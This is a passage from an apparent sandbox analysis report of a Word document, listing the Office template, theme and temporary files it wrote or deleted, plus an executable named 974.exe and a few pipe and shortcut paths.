905. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFEAD.tmp\\Headlines.thmx",
906. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFD8E.tmp\\View.thmx",
907. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7B.tmp\\chicago.xsl",
908. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851223fn=iso690.xsl",
909. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD4A.tmp\\harvardanglia2008officeonline.xsl",
910. "C:\\Users\\user\\AppData\\Local\\Temp\\cab437.tmp",
911. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF7C.tmp\\Content.inf",
912. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Building Blocks\\1033\\TM02835233fn=Text Sidebar (Annual Report Red and Black design).docx",
913. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFFCC.tmp\\Content.inf",
914. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328905fn=Chevron Accent.glox",
915. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC12.tmp\\Content.inf",
916. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF4B.tmp\\Quotable.thmx",
917. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFECD.tmp\\sist02.xsl",
918. "C:\\Users\\user\\AppData\\Local\\Temp\\cab498.tmp",
919. "C:\\Users\\user\\AppData\\Local\\Temp\\cab438.tmp",
920. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE9D.tmp\\content.inf",
921. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDE8.tmp\\content.inf",
922. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC01.tmp\\Content.inf",
923. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851216fn=apasixtheditionofficeonline.xsl",
924. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328916fn=Converging Text.glox",
925. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD3E8.tmp\\content.inf",
926. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF9D.tmp\\rings.glox",
927. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7B.tmp\\Content.inf",
928. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD4A.tmp\\Content.inf",
929. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Building Blocks\\1033\\TM03998158fn=Element.dotx",
930. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF6C.tmp\\Equations.dotx",
931. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFEAD.tmp\\Content.inf",
932. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
933. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7C.tmp\\Badge.thmx",
934. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE9D.tmp\\Parallax.thmx",
935. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457503fn=Quotable.thmx",
936. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD3E8.tmp\\Slate.thmx",
937. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1B4.tmp\\Content.inf",
938. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851218fn=gb.xsl",
939. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD5F1.tmp\\content.inf",
940. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851217fn=chicago.xsl",
941. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328975fn=Theme Picture Accent.glox",
942. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFECD.tmp\\Content.inf",
943. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF9D.tmp\\Content.inf",
944. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM10001103fn=Headlines.thmx",
945. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD488.tmp\\VaryingWidthList.glox",
946. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDE8.tmp\\Savon.thmx",
947. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF6C.tmp\\Content.inf",
948. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851224fn=iso690nmerical.xsl",
949. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD3A9.tmp\\Berlin.thmx",
950. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328986fn=Theme Picture Grid.glox",
951. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD5F1.tmp\\Droplet.thmx",
952. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDAA6.tmp\\content.inf",
953. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDAE6.tmp\\content.inf",
954. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDA38.tmp\\BracketList.glox",
955. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDAE6.tmp\\Mesh.thmx",
956. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD488.tmp\\Content.inf",
957. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457515fn=View.thmx",
958. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDA38.tmp\\Content.inf",
959. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDAA6.tmp\\Damask.thmx",
960. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7C.tmp\\Content.inf",
961. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDBB2.tmp\\Feathered.thmx",
962. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Building Blocks\\1033\\TM01840907fn=Equations.dotx",
963. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328998fn=Rings.glox",
964. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD3A9.tmp\\content.inf",
965. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851222fn=ieee2006officeonline.xsl",
966. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM04033925fn=Droplet.thmx",
967. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851221fn=harvardanglia2008officeonline.xsl",
968. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM10001106fn=Badge.thmx",
969. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM04033929fn=Slate.thmx",
970. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDC30.tmp\\content.inf",
971. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM04033921fn=Damask.thmx",
972. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDD5B.tmp\\Circuit.thmx",
973. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDC8E.tmp\\content.inf",
974. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM04033917fn=Berlin.thmx",
975. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDC30.tmp\\Dividend.thmx",
976. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDC8E.tmp\\Frame.thmx",
977. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457510fn=Savon.thmx",
978. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328990fn=Varying Width List.glox",
979. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457496fn=Parallax.thmx",
980. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDBB2.tmp\\Content.inf",
981. "C:\\Users\\user\\AppData\\Local\\Temp\\cab11D1.tmp",
982. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM10001105fn=Crop.thmx",
983. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDE36.tmp\\pictureorgchart.glox",
984. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM10001104fn=Feathered.thmx",
985. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457485fn=Mesh.thmx",
986. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDD5B.tmp\\content.inf",
987. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457475fn=Frame.thmx",
988. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851227fn=sist02.xsl",
989. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457464fn=Dividend.thmx",
990. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328893fn=BracketList.glox",
991. "C:\\Users\\user\\AppData\\Local\\Temp\\cab1419.tmp",
992. "C:\\Users\\user\\AppData\\Local\\Temp\\cab1488.tmp",
993. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD124F.tmp\\content.inf",
994. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13E8.tmp\\InterconnectedBlockProcess.glox",
995. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13A9.tmp\\turabian.xsl",
996. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM04033919fn=Circuit.thmx",
997. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1369.tmp\\gosttitle.xsl",
998. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD124F.tmp\\Wood_Type.thmx",
999. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13E9.tmp\\architecture.glox",
1000. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDE36.tmp\\Content.inf",
1001. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13E8.tmp\\Content.inf",
1002. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD15E0.tmp\\TabList.glox",
1003. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13A9.tmp\\Content.inf",
1004. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD15E1.tmp\\content.inf",
1005. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1640.tmp\\PictureFrame.glox",
1006. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1641.tmp\\Insight design set.dotx",
1007. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1369.tmp\\Content.inf",
1008. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13E9.tmp\\Content.inf",
1009. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03090434fn=Wood Type.thmx",
1010. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328925fn=Interconnected Block Process.glox",
1011. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1672.tmp\\ThemePictureAlternatingAccent.glox",
1012. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1661.tmp\\TabbedArc.glox",
1013. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851226fn=turabian.xsl",
1014. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1673.tmp\\content.inf",
1015. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD16C3.tmp\\content.inf",
1016. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD15E0.tmp\\Content.inf",
1017. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD15E1.tmp\\Metropolitan.thmx",
1018. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD16A3.tmp\\Basis.thmx",
1019. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1760.tmp\\RadialPictureList.glox",
1020. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851220fn=gosttitle.xsl",
1021. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1641.tmp\\Content.inf",
1022. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1640.tmp\\Content.inf",
1023. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD16C3.tmp\\Vapor_Trail.thmx",
1024. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Building Blocks\\1033\\TM03998159fn=Insight.dotx",
1025. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1672.tmp\\Content.inf",
1026. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328972fn=Tab List.glox",
1027. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328884fn=architecture.glox",
1028. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD16A3.tmp\\content.inf",
1029. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1673.tmp\\Main_Event.thmx",
1030. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1661.tmp\\Content.inf",
1031. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1760.tmp\\Content.inf",
1032. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328940fn=Radial Picture List.glox",
1033. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328983fn=Theme Picture Alternating Accent.glox",
1034. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457491fn=Metropolitan.thmx",
1035. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328935fn=Picture Organization Chart.glox",
1036. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328932fn=Picture Frame.glox",
1037. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328951fn=Tabbed Arc.glox",
1038. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03457444fn=Basis.thmx",
1039. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM04033927fn=Main Event.thmx",
1040. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM04033937fn=Vapor Trail.thmx",
1041. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\~$Normal.dotm",
1042. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRSBD4EB3C7-D200-4628-9978-DC6091B8D52B.tmp",
1043. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
1044. "C:\\Windows\\sysnative\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
1045. "\\??\\PIPE\\srvsvc",
1046. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\VHRK2YO7T8WZ12AR3NKF.temp",
1047. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF14e77f6.TMP",
1048. "C:\\Users\\user\\974.exe"
1049.  
1050.  
1051. * Deleted Files:
1052. "C:\\Users\\user\\AppData\\Local\\Temp\\CabA9CA.tmp",
1053. "C:\\Users\\user\\AppData\\Local\\Temp\\TarA9CB.tmp",
1054. "C:\\Users\\user\\Application Data\\Microsoft\\Forms\\WINWORD.box",
1055. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
1056. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
1057. "C:\\Users\\user\\AppData\\Local\\Temp\\CabF2FE.tmp",
1058. "C:\\Users\\user\\AppData\\Local\\Temp\\CabF2EC.tmp",
1059. "C:\\Users\\user\\AppData\\Local\\Temp\\CabF28C.tmp",
1060. "C:\\Users\\user\\AppData\\Local\\Temp\\TarF2FF.tmp",
1061. "C:\\Users\\user\\AppData\\Local\\Temp\\TarF29C.tmp",
1062. "C:\\Users\\user\\AppData\\Local\\Temp\\TarF2ED.tmp",
1063. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF72F.tmp",
1064. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF7AE.tmp",
1065. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF80C.tmp",
1066. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF72F.tmp\\gostname.xsl",
1067. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DB.tmp",
1068. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DD.tmp",
1069. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF87C.tmp",
1070. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DC.tmp",
1071. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF9CB.tmp",
1072. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEE51.tmp",
1073. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFA78.tmp",
1074. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF7AE.tmp\\mlaseventheditionofficeonline.xsl",
1075. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC01.tmp",
1076. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC12.tmp",
1077. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF80C.tmp\\HexagonRadial.glox",
1078. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC24.tmp",
1079. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF9CB.tmp\\CircleProcess.glox",
1080. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFD5E.tmp",
1081. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFD8E.tmp",
1082. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDE8.tmp",
1083. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7B.tmp",
1084. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFEAD.tmp",
1085. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF4B.tmp",
1086. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF6C.tmp",
1087. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF7C.tmp",
1088. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFFCC.tmp",
1089. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD4A.tmp",
1090. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEE52.tmp",
1091. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7A.tmp",
1092. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE9D.tmp",
1093. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1B4.tmp",
1094. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF9D.tmp",
1095. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFD5E.tmp\\Banded.thmx",
1096. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7C.tmp",
1097. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFECD.tmp",
1098. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7A.tmp\\iso690.xsl",
1099. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF87C.tmp\\Text Sidebar (Annual Report Red and Black design).docx",
1100. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC24.tmp\\chevronaccent.glox",
1101. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF043.tmp",
1102. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD3A9.tmp",
1103. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF7C.tmp\\APASixthEditionOfficeOnline.xsl",
1104. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DC.tmp\\ConvergingText.glox",
1105. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD3E8.tmp",
1106. "C:\\Users\\user\\AppData\\Local\\Temp\\cabECB7.tmp",
1107. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DB.tmp\\Element design set.dotx",
1108. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF4B.tmp\\Quotable.thmx",
1109. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD488.tmp",
1110. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF300.tmp",
1111. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DD.tmp\\gb.xsl",
1112. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD5F1.tmp",
1113. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF0D0.tmp",
1114. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF71.tmp",
1115. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7B.tmp\\chicago.xsl",
1116. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF042.tmp",
1117. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC01.tmp\\ThemePictureAccent.glox",
1118. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFEAD.tmp\\Headlines.thmx",
1119. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFFCC.tmp\\iso690nmerical.xsl",
1120. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFA78.tmp\\ThemePictureGrid.glox",
1121. "C:\\Users\\user\\AppData\\Local\\Temp\\cabECC8.tmp",
1122. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFAE6.tmp",
1123. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEB3D.tmp",
1124. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF1EC.tmp",
1125. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEEB2.tmp",
1126. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDAA6.tmp",
1127. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDAE6.tmp",
1128. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF83.tmp",
1129. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDA38.tmp",
1130. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEAFB.tmp",
1131. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF61.tmp",
1132. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFD8E.tmp\\View.thmx",
1133. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDBB2.tmp",
1134. "C:\\Users\\user\\AppData\\Local\\Temp\\cabECC9.tmp",
1135. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF469.tmp",
1136. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF75E.tmp",
1137. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDC8E.tmp",
1138. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDC30.tmp",
1139. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF6C.tmp\\Equations.dotx",
1140. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF9D.tmp\\rings.glox",
1141. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC12.tmp\\ieee2006officeonline.xsl",
1142. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD5F1.tmp\\Droplet.thmx",
1143. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD4A.tmp\\harvardanglia2008officeonline.xsl",
1144. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7C.tmp\\Badge.thmx",
1145. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD3E8.tmp\\Slate.thmx",
1146. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDE36.tmp",
1147. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDAA6.tmp\\Damask.thmx",
1148. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEEA1.tmp",
1149. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF15F.tmp",
1150. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFDCD.tmp",
1151. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF4F.tmp",
1152. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFD3E.tmp",
1153. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD3A9.tmp\\Berlin.thmx",
1154. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDE8.tmp\\Savon.thmx",
1155. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF9BA.tmp",
1156. "C:\\Users\\user\\AppData\\Local\\Temp\\cab437.tmp",
1157. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEB8C.tmp",
1158. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFC13.tmp",
1159. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD488.tmp\\VaryingWidthList.glox",
1160. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF8CB.tmp",
1161. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE9D.tmp\\Parallax.thmx",
1162. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1B4.tmp\\Crop.thmx",
1163. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDBB2.tmp\\Feathered.thmx",
1164. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDAE6.tmp\\Mesh.thmx",
1165. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF82D.tmp",
1166. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDC8E.tmp\\Frame.thmx",
1167. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFECD.tmp\\sist02.xsl",
1168. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDC30.tmp\\Dividend.thmx",
1169. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDA38.tmp\\BracketList.glox",
1170. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF47A.tmp",
1171. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD124F.tmp",
1172. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13E8.tmp",
1173. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13A9.tmp",
1174. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13E9.tmp",
1175. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDD5B.tmp\\Circuit.thmx",
1176. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1369.tmp",
1177. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF9AA.tmp",
1178. "C:\\Users\\user\\AppData\\Local\\Temp\\cab498.tmp",
1179. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEC39.tmp",
1180. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFBF1.tmp",
1181. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD15E0.tmp",
1182. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD15E1.tmp",
1183. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF94.tmp",
1184. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1640.tmp",
1185. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1641.tmp",
1186. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF643.tmp",
1187. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF613.tmp",
1188. "C:\\Users\\user\\AppData\\Local\\Temp\\cab438.tmp",
1189. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD124F.tmp\\Wood_Type.thmx",
